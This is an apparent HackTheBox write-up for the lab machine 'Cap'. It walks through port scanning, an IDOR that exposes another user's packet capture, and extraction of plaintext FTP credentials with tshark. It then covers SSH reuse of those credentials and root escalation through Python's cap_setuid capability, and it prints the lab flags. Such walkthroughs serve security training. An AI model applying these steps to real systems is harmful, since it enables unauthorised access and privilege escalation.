Cap is an easy-rated Linux machine from HackTheBox created by InfoSecJack. In the current post, my IP is 10.10.14.59, and the target’s IP is 10.129.252.36.
This machine runs an HTTP server with an open site with downloadable files with captured non-encrypted traffic. The improper control of this information results in Insecure Direct Object Reference (IDOR) by just changing a parameter at the URL, giving access to another user's capture with credentials inside. Then, for Privilege Scalation, there is an exploitable Linux capability.
Gathering Information
First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.
Local Terminal
$ ping 10.129.252.36
Pinging 10.129.252.36 with 32 bytes of data:
Reply from 10.129.252.36: bytes=32 time=488ms TTL=63
Reply from 10.129.252.36: bytes=32 time=149ms TTL=63
Reply from 10.129.252.36: bytes=32 time=150ms TTL=63
Reply from 10.129.252.36: bytes=32 time=159ms TTL=63
Ping statistics for 10.129.252.36:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 149ms, Maximum = 488ms, Average = 236ms
The target machine is working, and by the TTL we can assume that is a Linux Machine.
Local Terminal
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.252.36 -oN Ports
Nmap scan report for 10.129.252.36
Host is up, received echo-reply ttl 63 (0.27s latency).
Scanned at 2023-05-22 15:24:10 Pacific SA Standard Time for 18s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 18.28 seconds
Raw packets sent: 87205 (3.837MB) | Rcvd: 85813 (3.433MB)
Local Terminal
$ nmap -sCV -p 21,22,80 10.129.252.36 -oN WebScan
Nmap scan report for 10.129.252.36
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-title: Security Dashboard
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Mon, 22 May 2023 19:25:10 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
<...>
Ubuntu and http with gunicorn server, information worth to save.
Now that we have the basic information, we have to try with the generic tests, first with the FTP port
Local Terminal
$ ftp 10.129.252.36 # user: anonymous pass:
Connected to 10.129.252.36.
220 (vsFTPd 3.0.3)
Name (10.129.252.36:robertoalfaro): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed # Nothing here for now
Browser: http://10.129.252.36
Security Snapshot looks like an interesting site, you will be at http://10.129.252.36/data/1, there you can download a pcap file to analyze with Wireshark or other tool.
I assume that in the file should be information about the FTP server, that filter will be applied.
Local Terminal
$ tshark -r 1.pcap "ftp" 2>/dev/null #Nothing
51 1.706787 10.129.220.13 → 10.10.14.18 FTP 76 Response: 220 (vsFTPd 3.0.3)
65 1.922434 10.10.14.18 → 10.129.220.13 FTP 66 Request: AUTH TLS
67 1.922631 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
77 2.110156 10.10.14.18 → 10.129.220.13 FTP 62 Request: QUIT
79 2.110307 10.129.220.13 → 10.10.14.18 FTP 70 Response: 221 Goodbye.
87 2.391856 10.10.14.18 → 10.129.220.13 FTP 573 Request: \026\003\001\002\000\001\000\001�\003\003��E�[9��!3�C�+�+��u�2���͔\a\036�I P���9\016\025��O[U\b/XS�]��h��b�4\000\023M��\000�\023\002\023\003\023\001\000\005\000\026\0003\0009\0005\000
89 2.397110 10.129.220.13 → 10.10.14.18 FTP 76 Response: 220 (vsFTPd 3.0.3)
90 2.397233 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
91 2.397316 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
92 2.397361 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
93 2.397403 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
94 2.397445 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
95 2.397487 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
103 2.796944 10.129.220.13 → 10.10.14.18 FTP 76 Response: 220 (vsFTPd 3.0.3)
104 2.828784 10.10.14.18 → 10.129.220.13 FTP 148 Request: \026\003\001\000W\001\000\000S\003\003c�����\002���8�ⴜΖ�m��c\030�(�R;�
106 2.828897 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
107 2.828921 10.129.220.13 → 10.10.14.18 FTP 132 Response: 530 Please login with USER and PASS.
There is nothing here, but that site in particular is giving us a lot of information, a good option is to change the parameter of the URL and analyze the new file.
$ tshark -r 0.pcap "ftp" 2>/dev/null
34 2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
36 4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
38 4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
40 5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
42 5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
43 5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
45 5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
47 6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
49 6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
50 6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
51 6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
52 6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
54 7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
55 7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
56 7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
57 7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
58 7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
60 28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
61 28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
62 28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
63 28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
64 28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
65 28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
67 31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
68 31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.
# If you want to see the information more clear, you can use:
$ tshark -r 0.pcap -Y "ftp" -Tjson 2>/dev/null #To check the desired field
$ tshark -r 0.pcap -Y "ftp" -Tfields -e tcp.payload 2>/dev/null | xxd -ps -r
And we found credentials in that file, now we should be able to connect to the FTP server {user: nathan // password: Buck3tH4TF0RM3!}
Local Terminal
$ ftp 10.129.252.36
Connected to 10.129.252.36.
220 (vsFTPd 3.0.3)
Name (10.129.252.36:robertoalfaro): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
$ ls
229 Entering Extended Passive Mode (|||28192|)
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 May 22 16:12 user.txt #Just one file
226 Directory send OK.
$ get user.txt
100% |*********************************************************************************************************| 33 20.89 KiB/s 00:00 ETA
226 Transfer complete.
$ exit
Inside the FTP there was only a file called user.txt, has the name of the flag, but by the location looks like a fake flag.
Local Terminal
$ cat user.txt
b95a4a7339ef9a54ec29b489b69269d2
By bad, it was the flag... that's nice. So we got the flag without properly exploiting something.
Privileges Escalation?
Well, we have some credentials, what if we use then at the SSH too?
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
nathan@cap:~$ sudo -l
[sudo] password for nathan:
Sorry, user nathan may not run sudo on cap.
nathan@cap:~$ find \-perm -4000 2>/dev/null
# Nothing
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip # Here!!
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
Python3.8 have capabilities, with this we can change to root easily
Target Terminal [nathan]
nathan@cap:~$ python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("bash")
root@cap:~# cat /root/root.txt
ec8be766a686cb313b6d076df5defb25
